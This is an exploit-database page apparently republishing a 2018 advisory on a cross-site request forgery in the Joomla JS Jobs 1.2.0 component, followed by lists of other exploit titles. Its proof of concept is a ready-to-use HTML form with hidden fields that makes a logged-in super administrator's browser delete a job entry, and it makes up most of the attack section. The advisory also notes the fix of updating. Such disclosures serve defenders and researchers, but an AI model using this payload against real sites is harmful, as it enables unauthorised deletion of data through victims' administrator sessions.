Menu

Search for hundreds of thousands of exploits

"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery"

Author

Exploit author

"Sureshbabu Narvaneni"

Platform

Exploit platform

php

Release date

Exploit published date

2018-04-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#######################################
# Exploit Title: Joomla! Component Js Jobs - Multiple Cross Site Request Forgery Vulnerabilities
# Google Dork: N/A
# Date: 17-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://www.joomsky.com
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Affected Version: 1.2.0
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : NA
#######################################

1. Vendor Description:

JS Jobs for any business, industry body or staffing company wishing to
establish a presence on the internet. JS Jobs allows you to run your own,
unique jobs classifieds service where you or employer can advertise their
jobs and job seekers can upload their Resumes.

2. Technical Description:

The state changing actions in JS Jobs before 1.2.1 not having any random
token validation which results in Cross Site Request Forgery Vulnerability.

3. Proof of Concept:

Delete Job Entry [Super Admin Access]

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://[URL]/joomla/administrator/index.php"
method="POST">
      <input type="hidden" name="js&#95;sortby" value="0" />
      <input type="hidden" name="companyname" value="" />
      <input type="hidden" name="jobtitle" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="jobcategory" value="" />
      <input type="hidden" name="jobtype" value="" />
      <input type="hidden" name="datefrom" value="" />
      <input type="hidden" name="dateto" value="" />
      <input type="hidden" name="status" value="" />
      <input type="hidden" name="cid&#91;&#93;" value="[Job ID]" />
      <input type="hidden" name="limit" value="20" />
      <input type="hidden" name="limitstart" value="0" />
      <input type="hidden" name="option" value="com&#95;jsjobs" />
      <input type="hidden" name="task" value="job&#46;jobenforcedelete" />
      <input type="hidden" name="c" value="job" />
      <input type="hidden" name="view" value="job" />
      <input type="hidden" name="layout" value="jobs" />
      <input type="hidden" name="callfrom" value="jobs" />
      <input type="hidden" name="boxchecked" value="1" />
      <input type="hidden" name="sortby" value="asc" />
      <input type="hidden" name="my&#95;click" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution:

Update to latest version

https://extensions.joomla.org/extension/js-jobs/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-09-27 "iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection" webapps windows "Sureshbabu Narvaneni"
2018-04-24 "Open-AudIT 2.1 - CSV Macro Injection" webapps windows "Sureshbabu Narvaneni"
2018-04-18 "Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-17 "Joomla! Component jDownloads 3.2.58 - Cross Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-09 "WolfCMS 0.8.3.1 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-09 "WolfCMS 0.8.3.1 - Open Redirection" webapps php "Sureshbabu Narvaneni"
2018-04-05 "Joomla! Component JS Jobs 1.2.0 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-05 "GetSimple CMS 3.3.13 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-04-02 "OpenCMS 10.5.3 - Cross-Site Request Forgery" webapps php "Sureshbabu Narvaneni"
2018-04-02 "OpenCMS 10.5.3 - Cross-Site Scripting" webapps php "Sureshbabu Narvaneni"
2018-03-30 "Joomla! Component AcySMS 3.5.0 - CSV Macro Injection" webapps php "Sureshbabu Narvaneni"
2018-03-30 "Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection" webapps php "Sureshbabu Narvaneni"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.